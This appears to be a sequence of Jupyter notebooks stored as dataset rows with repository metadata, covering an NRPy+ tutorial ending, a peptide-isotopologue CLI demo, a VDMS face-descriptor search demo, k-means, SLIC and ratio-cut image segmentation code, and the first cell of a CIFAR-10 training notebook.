"Output C function calculate_StildeD0_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_validation\\RHSs\\calculate_StildeD0_source_term.h\nOutput C function calculate_StildeD1_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_validation\\RHSs\\calculate_StildeD1_source_term.h\nOutput C function calculate_StildeD2_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_validation\\RHSs\\calculate_StildeD2_source_term.h\nOutput C function calculate_StildeD0_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_library\\RHSs\\calculate_StildeD0_source_term.h\nOutput C function calculate_StildeD1_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_library\\RHSs\\calculate_StildeD1_source_term.h\nOutput C function calculate_StildeD2_source_term() to file GiRaFFE_NRPy\\GiRaFFE_Ccode_library\\RHSs\\calculate_StildeD2_source_term.h\nPrinting difference between original C code and this code...\nChecking file calculate_StildeD0_source_term.h\nNo difference. TEST PASSED!\nChecking file calculate_StildeD1_source_term.h\nNo difference. TEST PASSED!\nChecking file calculate_StildeD2_source_term.h\nNo difference. TEST PASSED!\n"
]
],
[
[
"<a id='latex_pdf_output'></a>\n\n# Step 3: Output this notebook to $\\LaTeX$-formatted PDF file \\[Back to [top](#toc)\\]\n$$\\label{latex_pdf_output}$$\n\nThe following code cell converts this Jupyter notebook into a proper, clickable $\\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename\n[Tutorial-GiRaFFE_NRPy_C_code_library-Source_Terms](TTutorial-GiRaFFE_NRPy_C_code_library-Source_Terms.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)",
"_____no_output_____"
]
],
[
[
"import cmdline_helper as cmd # NRPy+: Multi-platform Python command-line interface\ncmd.output_Jupyter_notebook_to_LaTeXed_PDF(\"Tutorial-GiRaFFE_NRPy-Source_Terms\",location_of_template_file=os.path.join(\"..\"))",
"Notebook output to PDF is only supported on Linux systems, with pdflatex installed.\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb5154eaa73afac2e0623f708c38bb833f7569f5 | 23,319 | ipynb | Jupyter Notebook | notebooks/demo_CLI.ipynb | pierrepo/seq-to-first-iso | 1e8864dd67b79097b4a88be142becc31a90dd093 | [
"BSD-3-Clause"
] | null | null | null | notebooks/demo_CLI.ipynb | pierrepo/seq-to-first-iso | 1e8864dd67b79097b4a88be142becc31a90dd093 | [
"BSD-3-Clause"
] | 2 | 2019-04-08T22:15:10.000Z | 2020-01-20T12:47:25.000Z | notebooks/demo_CLI.ipynb | pierrepo/seq-to-first-iso | 1e8864dd67b79097b4a88be142becc31a90dd093 | [
"BSD-3-Clause"
] | null | null | null | 34.14202 | 183 | 0.451263 | [
[
[
"# Command line interface of seq-to-first-iso\n\n**seq-to-first-iso** computes the first two isotopologue intentities (M0 and M1) from peptide sequences with natural carbon\nand with 99.99% 12C enriched carbon.\n\nThe program can take into account unlabelled amino acids to simulate auxotrophies to amino acids.\n\nseq-to-first-iso is available as a Python module.",
"_____no_output_____"
]
],
[
[
"import pandas as pd # For output visualisation.",
"_____no_output_____"
]
],
[
[
"*Note: the exclamation mark `!` is a magic command to run a Linux command within a Jupyter notebook. In a real Linux terminal, you don't need it.*",
"_____no_output_____"
]
],
[
[
"!seq-to-first-iso -v",
"seq-to-first-iso 1.1.0\n"
],
[
"!seq-to-first-iso -h",
"usage: seq-to-first-iso [-h] [-o OUTPUT] [-u amino_a] [-v]\n input_file_name sequence_col_name charge_col_name\n\nRead a tsv file with sequences and charges and compute intensity of first\nisotopologues\n\npositional arguments:\n input_file_name file to parse in .tsv format\n sequence_col_name column name with sequences\n charge_col_name column name with charges\n\noptional arguments:\n -h, --help show this help message and exit\n -o OUTPUT, --output OUTPUT\n name of output file\n -u amino_a, --unlabelled-aa amino_a\n amino acids with default abundance\n -v, --version show program's version number and exit\n"
],
[
"# File used.\n!cat peptides.tsv",
"pep_name\tpep_sequence\tpep_charge\nseq1\tYAQEISR\t2\nseq2\tVLLIDLRIPQR(Phospho)SAINHIVAPNLVNVDPNLLWDK\t3\nseq3\tQRTTFFVLGINTVNYPDIYEHILER\t2\nseq4\tAELFL(Glutathione)LNR\t1\nseq5\t.(Acetyl)VGEVFINYIQRQNELFQGKLAYLII(Oxidation)DTCLSIVRPNDSKPLDNR\t4\nseq6\tYKTMNTFDPD(Heme)EKFEWFQVWQAVK\t2\nseq7\tHKSASSPAV(Pro->Val)NADTDIQDSSTPSTSPSGRR\t2\nseq8\tFHNK\t1\nseq9\t.(Glutathione)MDLEIK\t3\nseq10\tLANEKPEDVFER\t2\nseq11\t.(Acetyl)SDTPLR(Oxidation)D(Acetyl)EDG(Acetyl)LDFWETLRSLATTNPNPPVEK\t3\nseq12\t.(Acetyl)ACDYMVR\t2\n"
]
],
[
[
"### Minimal command",
"_____no_output_____"
]
],
[
[
"!seq-to-first-iso peptides.tsv pep_sequence pep_charge",
"Namespace(charge_col_name='pep_charge', input_file_name=PosixPath('peptides.tsv'), output=None, sequence_col_name='pep_sequence', unlabelled_aa=[])\n[2020-01-09, 08:24:07] INFO : Parsing file\n[2020-01-09, 08:24:07] INFO : Read peptides.tsv\n[2020-01-09, 08:24:07] INFO : Found 12 lines and 3 columns\n[2020-01-09, 08:24:07] INFO : Reading sequences.\n[2020-01-09, 08:24:07] INFO : Computing composition and formula.\n[2020-01-09, 08:24:07] WARNING : Fe in (Heme) is not supported in the computation of M0 and M1\n[2020-01-09, 08:24:07] INFO : Computing neutral mass\n[2020-01-09, 08:24:07] INFO : Computing M0 and M1\n"
]
],
[
[
"Running the command above will write a tab-separated-values file (`peptides_stfi.tsv`).",
"_____no_output_____"
]
],
[
[
"# Read basic output file.\ndf = pd.read_csv(\"peptides_stfi.tsv\", sep=\"\\t\")\ndf.head()",
"_____no_output_____"
]
],
[
[
"### Changing output name",
"_____no_output_____"
],
[
"You can also change the name of the output file",
"_____no_output_____"
]
],
[
[
"!seq-to-first-iso peptides.tsv pep_sequence pep_charge -o seq_stfi",
"Namespace(charge_col_name='pep_charge', input_file_name=PosixPath('peptides.tsv'), output='seq_stfi', sequence_col_name='pep_sequence', unlabelled_aa=[])\n[2020-01-09, 08:24:16] INFO : Parsing file\n[2020-01-09, 08:24:16] INFO : Read peptides.tsv\n[2020-01-09, 08:24:16] INFO : Found 12 lines and 3 columns\n[2020-01-09, 08:24:16] INFO : Reading sequences.\n[2020-01-09, 08:24:16] INFO : Computing composition and formula.\n[2020-01-09, 08:24:16] WARNING : Fe in (Heme) is not supported in the computation of M0 and M1\n[2020-01-09, 08:24:16] INFO : Computing neutral mass\n[2020-01-09, 08:24:16] INFO : Computing M0 and M1\n"
],
[
"# Read output file with different name.\ndf = pd.read_csv(\"seq_stfi.tsv\", sep=\"\\t\")\ndf.head()",
"_____no_output_____"
]
],
[
[
"### Specifying unlabelled amino acids",
"_____no_output_____"
]
],
[
[
"!seq-to-first-iso peptides.tsv pep_sequence pep_charge -u V,W",
"Namespace(charge_col_name='pep_charge', input_file_name=PosixPath('peptides.tsv'), output=None, sequence_col_name='pep_sequence', unlabelled_aa=['V', 'W'])\n[2020-01-09, 08:24:23] INFO : Amino acid with default abundance: ['V', 'W']\n[2020-01-09, 08:24:23] INFO : Parsing file\n[2020-01-09, 08:24:23] INFO : Read peptides.tsv\n[2020-01-09, 08:24:23] INFO : Found 12 lines and 3 columns\n[2020-01-09, 08:24:23] INFO : Reading sequences.\n[2020-01-09, 08:24:23] INFO : Computing composition and formula.\n[2020-01-09, 08:24:23] WARNING : Fe in (Heme) is not supported in the computation of M0 and M1\n[2020-01-09, 08:24:23] INFO : Computing neutral mass\n[2020-01-09, 08:24:23] INFO : Computing M0 and M1\n"
],
[
"# Read output file with different name and unlabelled amino acids.\ndf = pd.read_csv(\"peptides_stfi.tsv\", sep=\"\\t\")\ndf.head()",
"_____no_output_____"
]
],
[
[
"The carbon of unlabelled amino acids is shown as `X` in column `stfi_formula_X`. \n\nFor peptide `YAQEISR`, there is no unlabelled amino acids, `stfi_formula` and `stfi_formula_X` are identical. M0 and M1 intensities are not affected by the V and W auxotrophy.\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
cb516acfdd9606432c63601f3d2a9c11b711dc0c | 6,357 | ipynb | Jupyter Notebook | docker/demo/examples/5 - Find Descriptors.ipynb | vuiseng9/vdms | 9bc14219c8942a3d686936b3f1105cc02a788a12 | [
"MIT"
] | 54 | 2018-03-07T20:20:42.000Z | 2022-03-23T08:34:38.000Z | docker/demo/examples/5 - Find Descriptors.ipynb | vuiseng9/vdms | 9bc14219c8942a3d686936b3f1105cc02a788a12 | [
"MIT"
] | 88 | 2018-02-22T23:21:58.000Z | 2022-03-22T21:04:17.000Z | docker/demo/examples/5 - Find Descriptors.ipynb | omp87/vdms | 85375005c9242c3a98229679ec38234ca3d386fe | [
"MIT"
] | 25 | 2018-05-09T21:44:15.000Z | 2022-02-21T19:23:30.000Z | 24.832031 | 137 | 0.425358 | [
[
[
"# Find Descriptors (Matching)\n\nSimilar to classification, VDMS supports feature vector search based on similariy matching as part of its API.\n\nIn this example, where we have a pre-load set of feature vectors and labels associated, \nwe can search for similar feature vectors, and query information related to it.\n\nWe will start by taking a new image, not seeing by VDMS before (FIX THIS), \nfind the faces on it, and run feature vector extraction, and finding images related to it:\n",
"_____no_output_____"
]
],
[
[
"import getDescriptors as g\n\nimagePath = \"images/1.jpg\"\ndescriptors = g.get_descriptors(imagePath)",
"_____no_output_____"
]
],
[
[
"Now that we have the new faces and its feature vectors, we can ask VDMS to return the similar descriptors.\n\nBut first, let's connect to VDMS:",
"_____no_output_____"
]
],
[
[
"import vdms\n\ndb = vdms.vdms()\ndb.connect(\"localhost\")",
"_____no_output_____"
]
],
[
[
"We can now search for similar descriptors by passing the descriptor of the face to VDMS as follows:",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport json\nimport util\n\nwho_is_this = descriptors[1] # Number 1 is Tom's face\n\nblob_array = []\n\nquery = \"\"\"\n[\n {\n \"FindDescriptor\" : {\n \"set\": \"hike_mt_rainier\", \n \"_ref\": 33, \n \"k_neighbors\": 4, \n \"results\": {\n \"list\": [\"_distance\", \"_id\", \"_label\"] \n }\n }\n }\n]\n\"\"\"\n\nblob_array.append(who_is_this)\n\nresponse, images = db.query(query, [blob_array])\nprint (db.get_last_response_str())",
"_____no_output_____"
]
],
[
[
"Now that we can see this similar descriptors, let's go one step further and retrieve the images asociated with those descriptors: ",
"_____no_output_____"
]
],
[
[
"blob_array = []\n\nquery = \"\"\"\n[\n {\n \"FindDescriptor\" : {\n \"set\": \"hike_mt_rainier\", \n \"_ref\": 33, \n \"k_neighbors\": 5, \n \"results\": {\n \"list\": [\"_distance\", \"_id\"] \n }\n }\n },\n {\n \"FindImage\" : {\n \"link\": { \"ref\": 33 }, \n \"operations\": [\n {\n \"type\": \"resize\",\n \"height\": 200,\n \"width\": 200\n }\n ],\n\n \"results\": {\n \"list\": [\"name_file\"]\n }\n }\n }\n]\n\"\"\"\n\nblob_array.append(who_is_this)\n\nresponse, images = db.query(query, [blob_array])\n\nutil.display_images(images)\n \nprint (\"Number of images:\", len(images))\n",
"_____no_output_____"
],
[
"%%javascript\nIPython.OutputArea.prototype._should_scroll = function(lines) {\n return false;\n}",
"_____no_output_____"
],
[
"import vdms\nimport numpy as np\nimport json\n\ndb = vdms.vdms()\ndb.connect(\"localhost\")\n\nwho_is_this = descriptors[1]\n\nblob_array = []\n\nquery = \"\"\"\n[\n {\n \"FindDescriptor\" : {\n \"set\": \"hike_mt_rainier\", \n \"_ref\": 33, \n \"k_neighbors\": 1, \n \"results\": {\n \"list\": [\"_distance\", \"_id\"] \n }\n }\n }, \n {\n \"FindEntity\" : {\n \"class\": \"Person\", \n \"link\": { \"ref\": 33 },\n \"_ref\": 34,\n \"results\": {\n \"list\": [\"name\", \"lastname\"]\n }\n }\n },\n {\n \"FindImage\" : {\n \"link\": { \"ref\": 34 }, \n \"operations\": [\n {\n \"type\": \"resize\",\n \"height\": 300,\n \"width\": 300\n }\n ],\n\n \"results\": {\n \"list\": [\"name_file\"]\n }\n }\n }\n]\n\"\"\"\n\nblob_array.append(who_is_this)\n\nresponse, images = db.query(query, [blob_array])\n\nutil.display_images(images) \nprint (\"Number of images:\", len(images))\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb5187d6a562b66868cbd4e0457d1bee70c685b5 | 550,039 | ipynb | Jupyter Notebook | problem_code.ipynb | Vinit-source/CSL7382-Medical-image-clustering-assignment.py | 22dc45b3307039193cfe9937eae2bb590bf8efb1 | [
"MIT"
] | null | null | null | problem_code.ipynb | Vinit-source/CSL7382-Medical-image-clustering-assignment.py | 22dc45b3307039193cfe9937eae2bb590bf8efb1 | [
"MIT"
] | 1 | 2021-08-07T06:21:15.000Z | 2021-08-07T06:21:15.000Z | problem_code.ipynb | Vinit-source/CSL7382-Medical-image-clustering-assignment.py | 22dc45b3307039193cfe9937eae2bb590bf8efb1 | [
"MIT"
] | null | null | null | 827.126316 | 205,334 | 0.941006 | [
[
[
"<a href=\"https://colab.research.google.com/github/Vinit-source/CSL7382-Medical-image-clustering-assignment.py/blob/main/problem_code.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# Problem\n\nImplement the **k-means**, **SLIC**, and **Ratio Cut** algorithms for segmenting a given bioimage into multiple segments. Use attached image or any other bioimage to show the segmentation results of your algorithms.",
"_____no_output_____"
],
[
"Utility Functions",
"_____no_output_____"
]
],
[
[
"def visualize_clusters(image, labels, n_clusters, subp):\n # convert to the shape of a vector of pixel values\n masked_image = np.copy(image)\n masked_image = masked_image.reshape((-1, 3))\n labels = labels.flatten()\n for i in range(n_clusters):\n # color (i.e cluster) to disable\n cluster = i\n masked_image[labels == cluster] = [255-150*i, 255-60*i, 155+3*i]\n\n # convert back to original shape\n masked_image = masked_image.reshape(image.shape)\n # show the image\n plt.subplot(subp).imshow(masked_image)\n plt.axis('off')\n\ndef plot_segmented_image( img, labels, num_clusters, subp):\n labels = labels.reshape( img.shape[:2] )\n plt.subplot(subp).imshow(img)\n plt.axis('off')\n for l in range( num_clusters ):\n try:\n plt.subplot(subp).contour( labels == l, levels=1, colors=[plt.get_cmap('coolwarm')( l / float( num_clusters ))] )\n except ValueError: #raised if `y` is empty.\n pass\n",
"_____no_output_____"
]
],
[
[
"# K-Means",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nclass KMeansClustering:\n def runKMeans(self, intensities: np.ndarray, n_clusters: int, n_iterations: int = 20) -> (list, np.array):\n '''\n The KMeans clustering algorithm.\n Returns:\n cluster_labels: list of labels for each point.\n '''\n self.n_clusters = n_clusters\n self.init_centroids(intensities)\n print('Running KMeans...')\n for i in range(n_iterations):\n \n cluster_int, cluster_ind = self.allocate(X, intensities)\n self.update_centroids(cluster_int)\n\n labels = np.empty((intensities.shape[0]))\n for i in range(n_clusters):\n labels[cluster_ind[i]] = i\n return labels, self.centroids\n \n def init_centroids(self, intensities: np.ndarray):\n '''\n Initialize centroids with random examples (or points) from the dataset.\n '''\n #Number of examples\n l = intensities.shape[0]\n #Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples\n rng = np.random.default_rng()\n self.centroids = intensities[rng.choice(l, size=self.n_clusters, replace=False)]\n self.centroids.astype(np.float32)\n\n \n def allocate(self, X: np.ndarray, intensities):\n '''\n This function forms new clusters from the centroids updated in the previous iterations.\n '''\n\n #Step 1: Allocate the closest points to the clusters to fill them with atleast one point.\n # Allocate the remaining points to the closest clusters\n #Calculate the differences in the features between centroids and X using broadcast subtract \n res = self.centroids - intensities[:, np.newaxis]\n\n #Find Manhattan distances of each point with all centroids \n dist = np.absolute(res)\n \n #Find the closest centroid from each point. \n # Find unique indices of the closest points. Using res again for optimization\n #not unique indices\n res = np.where(dist == dist.min(axis=1)[:, np.newaxis]) \n \n #res[0] is used as indices for row-wise indices in res[1]\n min_indices = res[1][np.unique(res[0])] \n \n indices = [[] for i in range(self.n_clusters)]\n for i, c in enumerate(min_indices):\n if not c == -1:\n # cluster_array[c] = np.append(cluster_array[c], [X[i]], axis=0) #add the point to the corresponding cluster\n indices[c].append(i)\n \n return [intensities[indices[i]] for i in range(self.n_clusters)], indices\n \n def update_centroids(self, cluster_int):\n '''\n This function updates the centroids based on the updated clusters.\n '''\n #Make a rough copy\n centroids = self.centroids\n \n #Find mean for every cluster\n for i in range(self.n_clusters):\n if len(cluster_int[i]) > 0:\n centroids[i] = np.mean(cluster_int[i])\n #Update fair copy \n self.centroids = centroids\n\nif __name__ == '__main__':\n img = Image.open('f1.png')\n plt.figure(figsize=(10,20))\n plt.subplot(121).imshow(img)\n plt.axis('off')\n img = np.array(img)\n print(f'img.shape: {img.shape}')\n X = []\n intensities = []\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n X.append([i, j])\n intensities.append(np.average(img[i][j]))\n X = np.array(X)\n intensities = np.array(intensities)\n\n k = 3\n KMC = KMeansClustering()\n labels, centroids = KMC.runKMeans(intensities, k, 10)\n visualize_clusters(img, labels, k, 122)\n \n plt.show()",
"img.shape: (493, 559, 3)\nRunning KMeans...\n"
]
],
[
[
"# SLIC",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom numpy import linalg as la\nfrom PIL import Image\nimport sys\nimport matplotlib.pyplot as plt\nfrom time import perf_counter\n\nclass SLIC:\n def runSlic(self, X: np.ndarray, intensities: np.ndarray, n_clusters: int, n_iterations: int, lmbda: float) -> list:\n '''\n The SLIC clustering algorithm.\n Returns:\n cluster_labels: list of labels for each point.\n '''\n self.n_clusters = n_clusters\n self.init_centroids(X, intensities)\n\n for i in range(n_iterations):\n cluster_int, cluster_loc, indices = self.allocate(X, intensities, lmbda)\n self.update_centroids(cluster_int, cluster_loc)\n\n labels = np.empty((X.shape[0]))\n for i in range(n_clusters):\n labels[indices[i]] = i\n return labels\n \n def init_centroids(self, X, intensities: np.ndarray):\n '''\n Initialize centroids with random examples (or points) from the dataset.\n '''\n #Number of examples\n l = intensities.shape[0]\n #Initialize centroids array with points from intensities with random indices chosen from 0 to number of examples\n rng = np.random.default_rng()\n indices = rng.choice(l, size=self.n_clusters, replace=False)\n self.centroids_c = X[indices]\n self.centroids_i = intensities[indices]\n self.centroids_i.astype(np.float32)\n\n \n def allocate(self, X: np.ndarray, intensities, lmbda):\n '''\n This function forms new clusters from the centroids updated in the previous iterations.\n '''\n # Allocate the points to the closest clusters\n #Calculate the differences in the features between centroids and X using broadcast subtract \n dist = np.absolute(self.centroids_i - intensities[:, np.newaxis]) + lmbda * la.norm(self.centroids_c - X[:, np.newaxis], axis=2)\n \n #Find the closest centroid from each point. \n # Find unique indices of the closest points. Using res again for optimization\n #not unique indices\n res = np.where(dist == dist.min(axis=1)[:, np.newaxis]) \n #res[0] is used as indices for row-wise indices in res[1]\n min_indices = res[1][np.unique(res[0])] \n\n indices = [[] for i in range(self.n_clusters)]\n for i, c in enumerate(min_indices):\n if not c == -1:\n indices[c].append(i)\n\n return [intensities[indices[i]] for i in range(self.n_clusters)], \\\n [X[indices[i]] for i in range(self.n_clusters)], indices\n \n def update_centroids(self, cluster_int, cluster_loc):\n '''\n This function updates the centroids based on the updated clusters.\n '''\n #Make a rough copy\n centroids_c = self.centroids_c\n centroids_i = self.centroids_i\n\n #Find mean for every cluster\n for i in range(self.n_clusters):\n if len(cluster_int[i]) > 0:\n centroids_i[i] = np.mean(cluster_int[i])\n centroids_c[i] = np.mean(cluster_loc[i], axis=0)\n #Update fair copy \n self.centroids_i = centroids_i\n self.centroids_c = centroids_c\n\nif __name__ == '__main__':\n img = Image.open('f1.png')\n plt.figure(figsize=(10, 20))\n plt.subplot('121').imshow(img)\n plt.axis('off')\n img = np.array(img)\n print(f'img.shape: {img.shape}')\n X = []\n intensities = []\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n X.append([i, j])\n intensities.append(np.average(img[i][j]))\n X = np.array(X)\n intensities = np.array(intensities)\n k = 25\n slic = SLIC()\n labels = slic.runSlic(X, intensities, k, 20, 0.25)\n visualize_clusters(img, labels, k, 122)\n # plot_segmented_image(img, labels, k)\n plt.show()\n",
"img.shape: (493, 559, 3)\n"
]
],
[
[
"# Ratio Cut",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom google.colab.patches import cv2_imshow\nfrom PIL import Image\nfrom numpy import linalg as la\nimport scipy.cluster.vq as vq\nimport matplotlib.pyplot as plt\nimport warnings\nimport math\n\nwarnings.simplefilter('ignore')\n\nclass Spectralclustering:\n def run(self, img, k, LOAD=True, lmbda=0.25, sigma=1):\n if not LOAD:\n print('Constructing Laplacian matrix...')\n L = self.construct_L(img, lmbda, sigma)\n \n print('Performing Eigen Value Decomposition of L...')\n l, V = la.eigh( L )\n \n with open('array.npy', 'wb') as fp:\n np.save(fp, V, allow_pickle=True)\n else:\n V = np.load('array.npy')\n\n # First K columns of V need to be clustered\n H = V[:,0:k]\n if( k==2 ):\n # In this case clustering on the Fiedler vector which gives very close approximation\n f = H[:,1]\n labels = np.ravel( np.sign( f ) )\n \n k=2\n else:\n # Run K-Means on eigenvector matrix \n centroids, labels = vq.kmeans2( H[:,:k], k )\n print(f'kmeans2 labels: {labels}')\n \n\n return labels\n\n def construct_L(self, img: np.ndarray, lmbda: int, sigma: int):\n try:\n h, w = img.shape[:2]\n except AttributeError:\n raise('img should be numpy array.')\n L = np.zeros((h*w, h*w))\n D = np.zeros((h*w,))\n for i in range(h):\n for j in range(w):\n # i - 1, j - 1\n if i - 1 >= 0 and j - 1 >= 0:\n L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)\n D[i * w + j] += 1\n D[(i - 1) * w + (j - 1)] += 1\n # i - 1, j\n if i - 1 >= 0:\n L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = -self.sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)\n D[(i - 1) * w + j] += 1\n D[i * w + j] += 1\n # i - 1, j + 1\n if i - 1 >= 0 and j + 1 < w:\n L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = -self.sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)\n D[(i - 1) * w + (j + 1)] += 1\n D[i * w + j] += 1\n # i, j - 1\n if j - 1 >= 0:\n \n L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = -self.sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)\n D[i * w + (j - 1)] += 1\n D[i * w + j] += 1\n \n for i in range(h):\n for j in range(w):\n L[i * w + j][i * w + j] = D[i * w + j]\n return L\n\n def sim(self, x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):\n dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])\n\n return math.exp(-(dist/sigma**2))\n\nif __name__ == '__main__':\n img = Image.open('/content/f1.png')\n k = 10\n LOAD = False\n # '''\n # --------------------------------------\n # CODE TO RESIZE ARRAY TO LOWER SIZE\n # ORIGINAL IMAGE WAS EXCEEDING MEMORY\n # --------------------------------------\n basewidth = 100\n wpercent = (basewidth/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n img = img.resize((basewidth,hsize), Image.ANTIALIAS)\n # Convert image to grayscale\n gray = img.convert('L')\n \n # Normalise image intensities to [0,1] values\n gray = np.asarray(gray).astype(float)/255.0\n\n # gray = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)\n s = Spectralclustering()\n labels = s.run(gray, k, LOAD=LOAD, lmbda=0.25, sigma=1)\n # labels = labels.reshape( gray.shape )\n # plot_segmented_image( img, labels, k, None, 'Spectral Clustering' )\n img = np.array(img)\n plt.figure(figsize=(10, 30))\n plt.subplot(131).imshow(img)\n plt.axis('off')\n visualize_clusters(img, labels, k,132)\n plot_segmented_image(img, labels, k, 133)\n plt.show()",
"Constructing Laplacian matrix...\nPerforming Eigen Value Decomposition of L...\nkmeans2 labels: [1 1 1 ... 1 1 1]\n"
]
],
[
[
"### Library Function",
"_____no_output_____"
]
],
[
[
"# import kmeans\nimport numpy as np\nfrom google.colab.patches import cv2_imshow\nfrom PIL import Image\nfrom numpy import linalg as la\nimport scipy.cluster.vq as vq\nimport matplotlib.pyplot as plt\nimport warnings\nimport math\nimport logging\nfrom sklearn.cluster import SpectralClustering\nwarnings.simplefilter('ignore')\n\ndef sim(x1, i1, j1, x2, i2, j2, lmbda = 0.25, sigma = 1):\n dist = np.linalg.norm([x1 - x2]) + lmbda * np.linalg.norm([i1 - i2, j1 - j2])\n return math.exp(-(dist/sigma**2))\n\ndef construct_W(img: np.ndarray, lmbda: float, sigma: float):\n try:\n h, w = img.shape[:2]\n except AttributeError:\n raise('img should be numpy array.')\n L = np.zeros((h*w, h*w))\n D = np.zeros((h*w,))\n for i in range(h):\n for j in range(w):\n # i - 1, j - 1\n if i - 1 >= 0 and j - 1 >= 0:\n L[(i - 1) * w + (j - 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j - 1)] = sim(img[i][j], i, j, img[i-1][j-1], i-1, j-1, lmbda, sigma)\n # i - 1, j\n if i - 1 >= 0:\n L[(i - 1) * w + j][i * w + j] = L[i * w + j][(i - 1) * w + j] = sim(img[i][j], i, j, img[i-1][j], i-1, j, lmbda, sigma)\n # i - 1, j + 1\n if i - 1 >= 0 and j + 1 < w:\n L[(i - 1) * w + (j + 1)][i * w + j] = L[i * w + j][(i - 1) * w + (j + 1)] = sim(img[i][j], i, j, img[i-1][j+1], i-1, j+1, lmbda, sigma)\n # i, j - 1\n if j - 1 >= 0:\n L[i * w + (j - 1)][i * w + j] = L[i * w + j][i * w + (j - 1)] = sim(img[i][j], i, j, img[i][j-1], i, j-1, lmbda, sigma)\n return L\n\n\n\ndef visualize_clusters_r(image, labels, n_clusters, subp):\n # convert to the shape of a vector of pixel values\n masked_image = np.copy(image)\n labels = labels.flatten()\n masked_image = masked_image.reshape(-1)\n for i in range(n_clusters):\n # color (i.e cluster) to disable\n cluster = i\n masked_image[labels == cluster] = 255-20*i\n\n # convert back to original shape\n masked_image = masked_image.reshape(image.shape)\n # show the image\n plt.subplot(subp).imshow(masked_image)\n plt.axis('off')\n\nif __name__ == '__main__':\n img = Image.open('/content/f1.png')\n k = 5\n # --------------------------------------\n # CODE TO RESIZE ARRAY TO LOWER SIZE\n # ORIGINAL IMAGE WAS EXCEEDING MEMORY\n # --------------------------------------\n basewidth = 100\n wpercent = (basewidth/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n img = img.resize((basewidth,hsize), Image.ANTIALIAS)\n plt.figure(figsize=(10, 30))\n plt.subplot(131).imshow(img)\n plt.axis('off')\n # Convert image to grayscale\n img = img.convert('L')\n\n # Normalise image intensities to [0,1] values\n img = np.asarray(img).astype(float)/255.0\n\n # img = np.array([[0, 1, 0], [1,0,1], [0,1,0]], dtype=float)\n logging.debug(f'img:{img}\\nimg.shape: {img.shape}')\n\n W = construct_W(img, 0, 1)\n sc = SpectralClustering(k, affinity='precomputed', n_init=10,\n assign_labels='kmeans')\n labels = sc.fit_predict(W) \n visualize_clusters_r(img, labels, k, 132)\n plot_segmented_image( img, labels, k, 133)\n plt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51907844b665d6ef7530f1f9a5978312510ab7 | 1,012,771 | ipynb | Jupyter Notebook | experiments.ipynb | ylsung/cifar10-fast | 8dcf3841d3ecbf645642f4b78b6adc51d4920f9e | [
"MIT"
] | 493 | 2018-10-26T19:41:15.000Z | 2022-03-08T23:25:05.000Z | experiments.ipynb | ylsung/cifar10-fast | 8dcf3841d3ecbf645642f4b78b6adc51d4920f9e | [
"MIT"
] | 9 | 2018-11-09T20:57:27.000Z | 2021-07-26T11:51:10.000Z | experiments.ipynb | ylsung/cifar10-fast | 8dcf3841d3ecbf645642f4b78b6adc51d4920f9e | [
"MIT"
] | 121 | 2018-11-09T14:48:56.000Z | 2022-03-01T01:57:16.000Z | 90.136258 | 365 | 0.554634 | [
[
[
"!sudo nvidia-persistenced\n!sudo nvidia-smi -ac 877,1530",
"Applications clocks set to \"(MEM 877, SM 1530)\" for GPU 00000000:00:1E.0\nAll done.\n"
],
